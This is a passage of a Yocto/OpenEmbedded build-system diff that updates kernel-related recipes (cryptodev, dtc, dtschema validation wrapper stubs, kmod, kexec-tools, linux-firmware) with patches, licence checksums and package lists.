+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+---
+ ioctl.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/ioctl.c b/ioctl.c
+index 3d332380..95481d4f 100644
+--- a/ioctl.c
++++ b/ioctl.c
+@@ -871,8 +871,10 @@ cryptodev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg_)
+ 		if (unlikely(ret)) {
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(4, 17, 0))
+ 			sys_close(fd);
+-#else
++#elif (LINUX_VERSION_CODE < KERNEL_VERSION(5, 11, 0))
+ 			ksys_close(fd);
++#else
++			close_fd(fd);
+ #endif
+ 			return ret;
+ 		}
diff --git a/meta/recipes-kernel/dtc/dtc.inc b/meta/recipes-kernel/dtc/dtc.inc
index 0650e3c82e..461ab8fbd3 100644
--- a/meta/recipes-kernel/dtc/dtc.inc
+++ b/meta/recipes-kernel/dtc/dtc.inc
@@ -5,9 +5,11 @@ SECTION = "bootloader"
 LICENSE = "GPLv2 | BSD"
 DEPENDS = "flex-native bison-native"
 
-SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git \
+SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git;branch=master \
            file://make_install.patch \
+           file://0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch \
            "
+
 UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+(\.\d+)+)"
 
 EXTRA_OEMAKE='NO_PYTHON=1 PREFIX="${prefix}" LIBDIR="${libdir}" DESTDIR="${D}"'
diff --git a/meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch b/meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch
new file mode 100644
index 0000000000..a2deb12d4b
--- /dev/null
+++ b/meta/recipes-kernel/dtc/dtc/0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch
@@ -0,0 +1,36 @@
+From f0119060ef1b9bd80e2cae487df1e4aedffb0e9b Mon Sep 17 00:00:00 2001
+From: Oleksiy Obitotskyy <oobitots@cisco.com>
+Date: Fri, 22 Jan 2021 09:12:48 +0200
+Subject: [PATCH] dtc: Fix Makefile to add CFLAGS not override
+
+Makefile override CFLAGS not extend them, so some of them
+missing. Sources builds out of kernel tree and probably not all
+options could be used (?). We need at least -fmacro-prefix-map/
+debug-prefix-map to eliminate absolute path in binaries.
+
+Upstream-Status: Pending
+Signed-off-by: Oleksiy Obitotskyy <oobitots@cisco.com>
+---
+ Makefile | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Makefile b/Makefile
+index 35d936f..b5b13cf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -20,10 +20,10 @@ CONFIG_LOCALVERSION =
+ # See libfdt_internal.h for details
+ ASSUME_MASK ?= 0
+ 
+-CPPFLAGS = -I libfdt -I . -DFDT_ASSUME_MASK=$(ASSUME_MASK)
++CPPFLAGS += -I libfdt -I . -DFDT_ASSUME_MASK=$(ASSUME_MASK)
+ WARNINGS = -Wall -Wpointer-arith -Wcast-qual -Wnested-externs \
+ 	-Wstrict-prototypes -Wmissing-prototypes -Wredundant-decls -Wshadow
+-CFLAGS = -g -Os $(SHAREDLIB_CFLAGS) -Werror $(WARNINGS) $(EXTRA_CFLAGS)
++CFLAGS += -g -Os $(SHAREDLIB_CFLAGS) -Werror $(WARNINGS) $(EXTRA_CFLAGS)
+ 
+ BISON = bison
+ LEX = flex
+-- 
+2.25.1
+
diff --git a/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch b/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch
new file mode 100644
index 0000000000..ec825cbf7b
--- /dev/null
+++ b/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch
@@ -0,0 +1,35 @@
+From 4827e0db6c4f7dea7f4094f49d3bb48ef6dfdc2d Mon Sep 17 00:00:00 2001
+From: David Gibson <david@gibson.dropbear.id.au>
+Date: Wed, 6 Jan 2021 14:52:26 +1100
+Subject: [PATCH] fdtdump: Fix gcc11 warning
+
+In one place, fdtdump abuses fdt_set_magic(), passing it just a small char
+array instead of the full fdt header it expects.  That's relying on the
+fact that in fact fdt_set_magic() will only actually access the first 4
+bytes of the buffer.
+
+This trips a new warning in GCC 11 - and it's entirely possible it was
+always UB.  So, don't do that.
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/utils/dtc/dtc.git/patch/?id=ca16a723fa9dde9c5da80dba567f48715000e77c]
+Signed-off-by: David Gibson <david@gibson.dropbear.id.au>
+---
+ fdtdump.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fdtdump.c b/fdtdump.c
+index 9613bef..d9fb374 100644
+--- a/fdtdump.c
++++ b/fdtdump.c
+@@ -217,7 +217,7 @@ int main(int argc, char *argv[])
+ 		char *p = buf;
+ 		char *endp = buf + len;
+ 
+-		fdt_set_magic(smagic, FDT_MAGIC);
++		fdt32_st(smagic, FDT_MAGIC);
+ 
+ 		/* poor man's memmem */
+ 		while ((endp - p) >= FDT_MAGIC_SIZE) {
+-- 
+2.30.1
+
diff --git a/meta/recipes-kernel/dtc/dtc_1.6.0.bb b/meta/recipes-kernel/dtc/dtc_1.6.0.bb
index 92df70d9fc..a407137859 100644
--- a/meta/recipes-kernel/dtc/dtc_1.6.0.bb
+++ b/meta/recipes-kernel/dtc/dtc_1.6.0.bb
@@ -5,6 +5,8 @@ LIC_FILES_CHKSUM = "file://GPL;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
 
 SRCREV = "2525da3dba9beceb96651dc2986581871dbeca30"
 
+SRC_URI += "file://0001-fdtdump-Fix-gcc11-warning.patch"
+
 S = "${WORKDIR}/git"
 
 BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate
new file mode 100644
index 0000000000..2aa57851c7
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-doc-validate wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+    case "$arg" in
+        --version)
+            echo "v2021.10"
+            ;;
+    esac
+done
+
+# TBD: left for future consideration
+# exec dt-doc-validate.real "$@"
+
+# we always succeed
+exit 0
+
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema
new file mode 100644
index 0000000000..24b89d8619
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-mk-schema wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+    case "$arg" in
+        --version)
+            echo "v2021.10"
+            ;;
+    esac
+done
+
+# TBD: left for future consideration
+# exec dt-mk-schema.real "$@"
+
+# we always succeed
+exit 0
+
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate
new file mode 100644
index 0000000000..8a4710a7ed
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-validate wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+    case "$arg" in
+        --version)
+            echo "v2021.10"
+            ;;
+    esac
+done
+
+# TBD: left for future consideration
+# exec dt-validate.real "$@"
+
+# we always succeed
+exit 0
+
diff --git a/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb b/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb
new file mode 100644
index 0000000000..c869274d09
--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb
@@ -0,0 +1,17 @@
+DESCRIPTION = "Wrapper for tooling for devicetree validation using YAML and jsonschema"
+HOMEPAGE = "https://yoctoproject.org"
+LICENSE = "MIT"
+LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
+
+SRC_URI = "file://dt-doc-validate \
+           file://dt-mk-schema \
+           file://dt-validate"
+
+do_install() {
+    install -d ${D}${bindir}/
+    install -m 755 ${WORKDIR}/dt-doc-validate ${D}${bindir}/
+    install -m 755 ${WORKDIR}/dt-mk-schema ${D}${bindir}/
+    install -m 755 ${WORKDIR}/dt-validate ${D}${bindir}/
+}
+
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb b/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
index 4f1af731d6..82d678e509 100644
--- a/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
+++ b/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
@@ -1,4 +1,8 @@
 SUMMARY = "Tools for managing Yocto Project style branched kernels"
+DESCRIPTION = "Powerful set of tools or managing Yocto Linux kernel sources \
+and configuration data. You can use these tools to make a single configuration \
+change, apply multiple patches, or work with your own kernel sources."
+HOMEPAGE = "https://www.yoctoproject.org/"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://tools/kgit;beginline=5;endline=9;md5=9c30e971d435e249624278c3e343e501"
 
@@ -10,7 +14,7 @@ PV = "0.2+git${SRCPV}"
 
 inherit native
 
-SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git"
+SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git;branch=master"
 S = "${WORKDIR}/git"
 UPSTREAM_CHECK_COMMITS = "1"
 
diff --git a/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb b/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
index 871b36440f..206c6ccae7 100644
--- a/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
+++ b/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
@@ -30,6 +30,9 @@ inherit autotools update-rc.d systemd
 export LDFLAGS = "-L${STAGING_LIBDIR}"
 EXTRA_OECONF = " --with-zlib=yes"
 
+# affects kexec-tools shipped by Fedora versions prior to 2.0.21-8 and RHEL versions prior to 2.0.20-47.
+CVE_CHECK_WHITELIST += "CVE-2021-20269"
+
 do_compile_prepend() {
     # Remove the prepackaged config.h from the source tree as it overrides
     # the same file generated by configure and placed in the build tree
diff --git a/meta/recipes-kernel/kmod/kmod.inc b/meta/recipes-kernel/kmod/kmod.inc
index 5dae30ed88..631b50658a 100644
--- a/meta/recipes-kernel/kmod/kmod.inc
+++ b/meta/recipes-kernel/kmod/kmod.inc
@@ -18,7 +18,7 @@ SRCREV = "58133a96c894c043e48c74ddf0bfe8db90bac62f"
 # Lookout for PV bump too when SRCREV is changed
 PV = "26"
 
-SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \
+SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git;branch=master \
            file://depmod-search.conf \
            file://0001-build-Stop-using-dolt.patch \
            file://avoid_parallel_tests.patch \
@@ -26,7 +26,6 @@ SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \
 
 S = "${WORKDIR}/git"
 
-EXTRA_AUTORECONF += "--install --symlink"
 EXTRA_OECONF +=" --enable-tools --with-zlib"
 
 PACKAGECONFIG[debug] = "--enable-debug,--disable-debug"
diff --git a/meta/recipes-kernel/kmod/kmod/ptest.patch b/meta/recipes-kernel/kmod/kmod/ptest.patch
deleted file mode 100644
index 831dbcb909..0000000000
--- a/meta/recipes-kernel/kmod/kmod/ptest.patch
+++ /dev/null
@@ -1,25 +0,0 @@
-Add 'install-ptest' rule.
-
-Signed-off-by: Tudor Florea <tudor.florea@enea.com>
-Upstream-Status: Pending
-
-diff -ruN a/Makefile.am b/Makefile.am
---- a/Makefile.am	2013-07-12 17:11:05.278331557 +0200
-+++ b/Makefile.am	2013-07-12 17:14:27.033788016 +0200
-@@ -204,6 +204,16 @@
- 
- distclean-local: $(DISTCLEAN_LOCAL_HOOKS)
- 
-+install-ptest:
-+	@$(MKDIR_P) $(DESTDIR)/testsuite
-+	@for file in $(TESTSUITE); do \
-+		install $$file $(DESTDIR)/testsuite; \
-+	done;
-+	@sed -e 's/^Makefile/_Makefile/' < Makefile > $(DESTDIR)/Makefile
-+	@$(MKDIR_P) $(DESTDIR)/tools
-+	@cp $(noinst_SCRIPTS) $(noinst_PROGRAMS) $(DESTDIR)/tools
-+	@cp -r testsuite/rootfs testsuite/.libs $(DESTDIR)/testsuite
-+
- # ------------------------------------------------------------------------------
- # custom release helpers
- # ------------------------------------------------------------------------------
diff --git a/meta/recipes-kernel/linux-firmware/linux-firmware_20201022.bb b/meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb
index 045f2647e0..873ba9cdf0 100644
--- a/meta/recipes-kernel/linux-firmware/linux-firmware_20201022.bb
+++ b/meta/recipes-kernel/linux-firmware/linux-firmware_20240220.bb
@@ -1,4 +1,8 @@
 SUMMARY = "Firmware files for use with Linux kernel"
+HOMEPAGE = "https://www.kernel.org/"
+DESCRIPTION = "Linux firmware is a package distributed alongside the Linux kernel \
+that contains firmware binary blobs necessary for partial or full functionality \
+of certain hardware devices."
 SECTION = "kernel"
 
 LICENSE = "\
@@ -23,7 +27,6 @@ LICENSE = "\
     & Firmware-go7007 \
     & Firmware-GPLv2 \
     & Firmware-hfi1_firmware \
-    & Firmware-i2400m \
     & Firmware-i915 \
     & Firmware-ibt_firmware \
     & Firmware-ice \
@@ -31,6 +34,7 @@ LICENSE = "\
     & Firmware-iwlwifi_firmware \
     & Firmware-IntcSST2 \
     & Firmware-kaweth \
+    & Firmware-Lontium \
     & Firmware-Marvell \
     & Firmware-moxa \
     & Firmware-myri10ge_firmware \
@@ -41,6 +45,7 @@ LICENSE = "\
     & Firmware-phanfw \
     & Firmware-qat \
     & Firmware-qcom \
+    & Firmware-qcom-yamato \
     & Firmware-qla1280 \
     & Firmware-qla2xxx \
     & Firmware-qualcommAthos_ar3k \
@@ -52,7 +57,6 @@ LICENSE = "\
     & Firmware-rtlwifi_firmware \
     & Firmware-imx-sdma_firmware \
     & Firmware-siano \
-    & Firmware-tda7706-firmware \
     & Firmware-ti-connectivity \
     & Firmware-ti-keystone \
     & Firmware-ueagle-atm4-firmware \
@@ -67,8 +71,8 @@ LICENSE = "\
 LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
                     file://LICENCE.adsp_sst;md5=615c45b91a5a4a9fe046d6ab9a2df728 \
                     file://LICENCE.agere;md5=af0133de6b4a9b2522defd5f188afd31 \
-                    file://LICENSE.amdgpu;md5=d357524f5099e2a3db3c1838921c593f \
-                    file://LICENSE.amd-ucode;md5=3c5399dc9148d7f0e1f41e34b69cf14f \
+                    file://LICENSE.amdgpu;md5=a2589a05ea5b6bd2b7f4f623c7e7a649 \
+                    file://LICENSE.amd-ucode;md5=6ca90c57f7b248de1e25c7f68ffc4698 \
                     file://LICENSE.amlogic_vdec;md5=dc44f59bf64a81643e500ad3f39a468a \
                     file://LICENCE.atheros_firmware;md5=30a14c7823beedac9fa39c64fdd01a13 \
                     file://LICENSE.atmel;md5=aa74ac0c60595dee4d4e239107ea77a3 \
@@ -86,14 +90,14 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
                     file://LICENCE.go7007;md5=c0bb9f6aaaba55b0529ee9b30aa66beb \
                     file://GPL-2;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
                     file://LICENSE.hfi1_firmware;md5=5e7b6e586ce7339d12689e49931ad444 \
-                    file://LICENCE.i2400m;md5=14b901969e23c41881327c0d9e4b7d36 \
                     file://LICENSE.i915;md5=2b0b2e0d20984affd4490ba2cba02570 \
                     file://LICENCE.ibt_firmware;md5=fdbee1ddfe0fb7ab0b2fcd6b454a366b \
                     file://LICENSE.ice;md5=742ab4850f2670792940e6d15c974b2f \
                     file://LICENCE.IntcSST2;md5=9e7d8bea77612d7cc7d9e9b54b623062 \
                     file://LICENCE.it913x;md5=1fbf727bfb6a949810c4dbfa7e6ce4f8 \
-                    file://LICENCE.iwlwifi_firmware;md5=3fd842911ea93c29cd32679aa23e1c88 \
+                    file://LICENCE.iwlwifi_firmware;md5=2ce6786e0fc11ac6e36b54bb9b799f1b \
                     file://LICENCE.kaweth;md5=b1d876e562f4b3b8d391ad8395dfe03f \
+                    file://LICENSE.Lontium;md5=4ec8dc582ff7295f39e2ca6a7b0be2b6 \
                     file://LICENCE.Marvell;md5=28b6ed8bd04ba105af6e4dcd6e997772 \
                     file://LICENCE.mediatek;md5=7c1976b63217d76ce47d0a11d8a79cf2 \
                     file://LICENCE.moxa;md5=1086614767d8ccf744a923289d3d4261 \
@@ -104,8 +108,9 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
                     file://LICENCE.OLPC;md5=5b917f9d8c061991be4f6f5f108719cd \
                     file://LICENCE.open-ath9k-htc-firmware;md5=1b33c9f4d17bc4d457bdb23727046837 \
                     file://LICENCE.phanfw;md5=954dcec0e051f9409812b561ea743bfa \
-                    file://LICENCE.qat_firmware;md5=9e7d8bea77612d7cc7d9e9b54b623062 \
+                    file://LICENCE.qat_firmware;md5=72de83dfd9b87be7685ed099a39fbea4 \
                     file://LICENSE.qcom;md5=164e3362a538eb11d3ac51e8e134294b \
+                    file://LICENSE.qcom_yamato;md5=d0de0eeccaf1843a850bf7a6777eec5c \
                     file://LICENCE.qla1280;md5=d6895732e622d950609093223a2c4f5d \
                     file://LICENCE.qla2xxx;md5=505855e921b75f1be4a437ad9b79dff0 \
                     file://LICENSE.QualcommAtheros_ar3k;md5=b5fe244fb2b532311de1472a3bc06da5 \
@@ -117,7 +122,6 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
                     file://LICENCE.rtlwifi_firmware.txt;md5=00d06cfd3eddd5a2698948ead2ad54a5 \
                     file://LICENSE.sdma_firmware;md5=51e8c19ecc2270f4b8ea30341ad63ce9 \
                     file://LICENCE.siano;md5=4556c1bf830067f12ca151ad953ec2a5 \
-                    file://LICENCE.tda7706-firmware.txt;md5=835997cf5e3c131d0dddd695c7d9103e \
                     file://LICENCE.ti-connectivity;md5=c5e02be633f1499c109d1652514d85ec \
                     file://LICENCE.ti-keystone;md5=3a86335d32864b0bef996bee26cc0f2c \
                     file://LICENCE.ueagle-atm4-firmware;md5=4ed7ea6b507ccc583b9d594417714118 \
@@ -126,8 +130,11 @@ LIC_FILES_CHKSUM = "file://LICENCE.Abilis;md5=b5ee3f410780e56711ad48eadc22b8bc \
                     file://LICENCE.xc4000;md5=0ff51d2dc49fce04814c9155081092f0 \
                     file://LICENCE.xc5000;md5=1e170c13175323c32c7f4d0998d53f66 \
                     file://LICENCE.xc5000c;md5=12b02efa3049db65d524aeb418dd87ca \
-                    file://WHENCE;md5=daf28db5d6353de0a886f08106cffa22 \
+                    file://WHENCE;md5=${WHENCE_CHKSUM} \
                     "
+# WHENCE checksum is defined separately to ease overriding it if
+# class-devupstream is selected.
+WHENCE_CHKSUM  = "a344e6c28970fc7daafa81c10247aeb6"
 
 # These are not common licenses, set NO_GENERIC_LICENSE for them
 # so that the license files will be copied from fetched source
@@ -153,7 +160,6 @@ NO_GENERIC_LICENSE[Firmware-fw_sst_0f28] = "LICENCE.fw_sst_0f28"
 NO_GENERIC_LICENSE[Firmware-go7007] = "LICENCE.go7007"
 NO_GENERIC_LICENSE[Firmware-GPLv2] = "GPL-2"
 NO_GENERIC_LICENSE[Firmware-hfi1_firmware] = "LICENSE.hfi1_firmware"
-NO_GENERIC_LICENSE[Firmware-i2400m] = "LICENCE.i2400m"
 NO_GENERIC_LICENSE[Firmware-i915] = "LICENSE.i915"
 NO_GENERIC_LICENSE[Firmware-ibt_firmware] = "LICENCE.ibt_firmware"
 NO_GENERIC_LICENSE[Firmware-ice] = "LICENSE.ice"
@@ -161,6 +167,7 @@ NO_GENERIC_LICENSE[Firmware-IntcSST2] = "LICENCE.IntcSST2"
 NO_GENERIC_LICENSE[Firmware-it913x] = "LICENCE.it913x"
 NO_GENERIC_LICENSE[Firmware-iwlwifi_firmware] = "LICENCE.iwlwifi_firmware"
 NO_GENERIC_LICENSE[Firmware-kaweth] = "LICENCE.kaweth"
+NO_GENERIC_LICENSE[Firmware-Lontium] = "LICENSE.Lontium"
 NO_GENERIC_LICENSE[Firmware-Marvell] = "LICENCE.Marvell"
 NO_GENERIC_LICENSE[Firmware-mediatek] = "LICENCE.mediatek"
 NO_GENERIC_LICENSE[Firmware-moxa] = "LICENCE.moxa"
@@ -172,6 +179,7 @@ NO_GENERIC_LICENSE[Firmware-ath9k-htc] = "LICENCE.open-ath9k-htc-firmware"
 NO_GENERIC_LICENSE[Firmware-phanfw] = "LICENCE.phanfw"
 NO_GENERIC_LICENSE[Firmware-qat] = "LICENCE.qat_firmware"
 NO_GENERIC_LICENSE[Firmware-qcom] = "LICENSE.qcom"
+NO_GENERIC_LICENSE[Firmware-qcom-yamato] = "LICENSE.qcom_yamato"
 NO_GENERIC_LICENSE[Firmware-qla1280] = "LICENCE.qla1280"
 NO_GENERIC_LICENSE[Firmware-qla2xxx] = "LICENCE.qla2xxx"
 NO_GENERIC_LICENSE[Firmware-qualcommAthos_ar3k] = "LICENSE.QualcommAtheros_ar3k"
@@ -183,7 +191,6 @@ NO_GENERIC_LICENSE[Firmware-ralink-firmware] = "LICENCE.ralink-firmware.txt"
 NO_GENERIC_LICENSE[Firmware-rtlwifi_firmware] = "LICENCE.rtlwifi_firmware.txt"
 NO_GENERIC_LICENSE[Firmware-siano] = "LICENCE.siano"
 NO_GENERIC_LICENSE[Firmware-imx-sdma_firmware] = "LICENSE.sdma_firmware"
-NO_GENERIC_LICENSE[Firmware-tda7706-firmware] = "LICENCE.tda7706-firmware.txt"
 NO_GENERIC_LICENSE[Firmware-ti-connectivity] = "LICENCE.ti-connectivity"
 NO_GENERIC_LICENSE[Firmware-ti-keystone] = "LICENCE.ti-keystone"
 NO_GENERIC_LICENSE[Firmware-ueagle-atm4-firmware] = "LICENCE.ueagle-atm4-firmware"
@@ -196,9 +203,16 @@ NO_GENERIC_LICENSE[WHENCE] = "WHENCE"
 
 PE = "1"
 
-SRC_URI = "${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz"
+SRC_URI = "\
+  ${KERNELORG_MIRROR}/linux/kernel/firmware/${BPN}-${PV}.tar.xz \
+"
+
+BBCLASSEXTEND = "devupstream:target"
+SRC_URI:class-devupstream = "git://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git;protocol=https;branch=main"
+# Pin this to the 20220509 release, override this in local.conf
+SRCREV:class-devupstream ?= "b19cbdca78ab2adfd210c91be15a22568e8b8cae"
 
-SRC_URI[sha256sum] = "bf586e0beb4c65f22bf0a79811f259aa0a5a7cc9f70eebecb260525b6914cef7"
+SRC_URI[sha256sum] = "bf0f239dc0801e9d6bf5d5fb3e2f549575632cf4688f4348184199cb02c2bcd7"
 
 inherit allarch
 
@@ -209,7 +223,8 @@ do_compile() {
 }
 
 do_install() {
-        oe_runmake 'DESTDIR=${D}' 'FIRMWAREDIR=${nonarch_base_libdir}/firmware' install
+        # install-nodedup avoids rdfind dependency
+        oe_runmake 'DESTDIR=${D}' 'FIRMWAREDIR=${nonarch_base_libdir}/firmware' install-nodedup
         cp GPL-2 LICEN[CS]E.* WHENCE ${D}${nonarch_base_libdir}/firmware/
 }
 
@@ -222,8 +237,10 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
              ${PN}-sd8887 ${PN}-sd8897 ${PN}-sd8997 ${PN}-usb8997 \
              ${PN}-ti-connectivity-license ${PN}-wlcommon ${PN}-wl12xx ${PN}-wl18xx \
              ${PN}-vt6656-license ${PN}-vt6656 \
+             ${PN}-rs9113 ${PN}-rs9116 \
              ${PN}-rtl-license ${PN}-rtl8188 ${PN}-rtl8192cu ${PN}-rtl8192ce ${PN}-rtl8192su ${PN}-rtl8723 ${PN}-rtl8821 \
              ${PN}-rtl8168 \
+             ${PN}-rtl8822 \
              ${PN}-cypress-license \
              ${PN}-broadcom-license \
              ${PN}-bcm-0bb4-0306 \
@@ -261,7 +278,7 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
              ${PN}-bcm43xx-hdr \
              ${PN}-atheros-license ${PN}-ar9170 ${PN}-ath6k ${PN}-ath9k \
              ${PN}-gplv2-license ${PN}-carl9170 \
-             ${PN}-ar3k-license ${PN}-ar3k ${PN}-ath10k-license ${PN}-ath10k ${PN}-qca \
+             ${PN}-ar3k-license ${PN}-ar3k ${PN}-ath10k-license ${PN}-ath10k ${PN}-ath11k ${PN}-qca \
              \
              ${PN}-imx-sdma-license ${PN}-imx-sdma-imx6q ${PN}-imx-sdma-imx7d \
              \
@@ -293,11 +310,22 @@ PACKAGES =+ "${PN}-ralink-license ${PN}-ralink \
              ${PN}-nvidia-gpu \
              ${PN}-netronome-license ${PN}-netronome \
              ${PN}-qat ${PN}-qat-license \
-             ${PN}-qcom-license \
+             ${PN}-qcom-license ${PN}-qcom-yamato-license \
              ${PN}-qcom-venus-1.8 ${PN}-qcom-venus-4.2 ${PN}-qcom-venus-5.2 ${PN}-qcom-venus-5.4 \
-             ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a530 ${PN}-qcom-adreno-a630 \
-             ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \
+             ${PN}-qcom-vpu-1.0 ${PN}-qcom-vpu-2.0 \
+             ${PN}-qcom-adreno-a2xx ${PN}-qcom-adreno-a3xx ${PN}-qcom-adreno-a4xx ${PN}-qcom-adreno-a530 \
+             ${PN}-qcom-adreno-a630 ${PN}-qcom-adreno-a650 ${PN}-qcom-adreno-a660 \
+             ${PN}-qcom-apq8016-modem ${PN}-qcom-apq8016-wifi \
+             ${PN}-qcom-apq8096-adreno ${PN}-qcom-apq8096-audio ${PN}-qcom-apq8096-modem \
+             ${PN}-qcom-sc8280xp-lenovo-x13s-compat \
+             ${PN}-qcom-sc8280xp-lenovo-x13s-audio \
+             ${PN}-qcom-sc8280xp-lenovo-x13s-adreno \
+             ${PN}-qcom-sc8280xp-lenovo-x13s-compute \
+             ${PN}-qcom-sc8280xp-lenovo-x13s-sensors \
+             ${PN}-qcom-sdm845-adreno ${PN}-qcom-sdm845-audio ${PN}-qcom-sdm845-compute ${PN}-qcom-sdm845-modem \
+             ${PN}-qcom-sm8250-adreno ${PN}-qcom-sm8250-audio ${PN}-qcom-sm8250-compute \
              ${PN}-amlogic-vdec-license ${PN}-amlogic-vdec \
+             ${PN}-lt9611uxc ${PN}-lontium-license \
              ${PN}-whence-license \
              ${PN}-license \
              "
@@ -340,7 +368,7 @@ FILES_${PN}-carl9170 = " \
 RDEPENDS_${PN}-carl9170 += "${PN}-gplv2-license"
 
 # For QualCommAthos
-LICENSE_${PN}-ar3k = "Firmware-qualcommAthos_ar3k"
+LICENSE_${PN}-ar3k = "Firmware-qualcommAthos_ar3k & Firmware-atheros_firmware"
 LICENSE_${PN}-ar3k-license = "Firmware-qualcommAthos_ar3k"
 LICENSE_${PN}-ath10k = "Firmware-qualcommAthos_ath10k"
 LICENSE_${PN}-ath10k-license = "Firmware-qualcommAthos_ath10k"
@@ -356,12 +384,17 @@ FILES_${PN}-ath10k = " \
   ${nonarch_base_libdir}/firmware/ath10k \
 "
 
+FILES_${PN}-ath11k = " \
+  ${nonarch_base_libdir}/firmware/ath11k \
+"
+
 FILES_${PN}-qca = " \
   ${nonarch_base_libdir}/firmware/qca \
 "
 
-RDEPENDS_${PN}-ar3k += "${PN}-ar3k-license"
+RDEPENDS_${PN}-ar3k += "${PN}-ar3k-license ${PN}-atheros-license"
 RDEPENDS_${PN}-ath10k += "${PN}-ath10k-license"
+RDEPENDS_${PN}-ath11k += "${PN}-ath10k-license"
 RDEPENDS_${PN}-qca += "${PN}-ath10k-license"
 
 # For ralink
@@ -381,7 +414,7 @@ LICENSE_${PN}-mt7601u-license = "Firmware-ralink_a_mediatek_company_firmware"
 
 FILES_${PN}-mt7601u-license = "${nonarch_base_libdir}/firmware/LICENCE.ralink_a_mediatek_company_firmware"
 FILES_${PN}-mt7601u = " \
-  ${nonarch_base_libdir}/firmware/mt7601u.bin \
+  ${nonarch_base_libdir}/firmware/mediatek/mt7601u.bin \
 "
 
 RDEPENDS_${PN}-mt7601u += "${PN}-mt7601u-license"
@@ -397,6 +430,12 @@ FILES_${PN}-radeon = " \
 
 RDEPENDS_${PN}-radeon += "${PN}-radeon-license"
 
+# For lontium
+LICENSE_${PN}-lt9611uxc = "Firmware-Lontium"
+
+FILES_${PN}-lontium-license = "${nonarch_base_libdir}/firmware/LICENSE.Lontium"
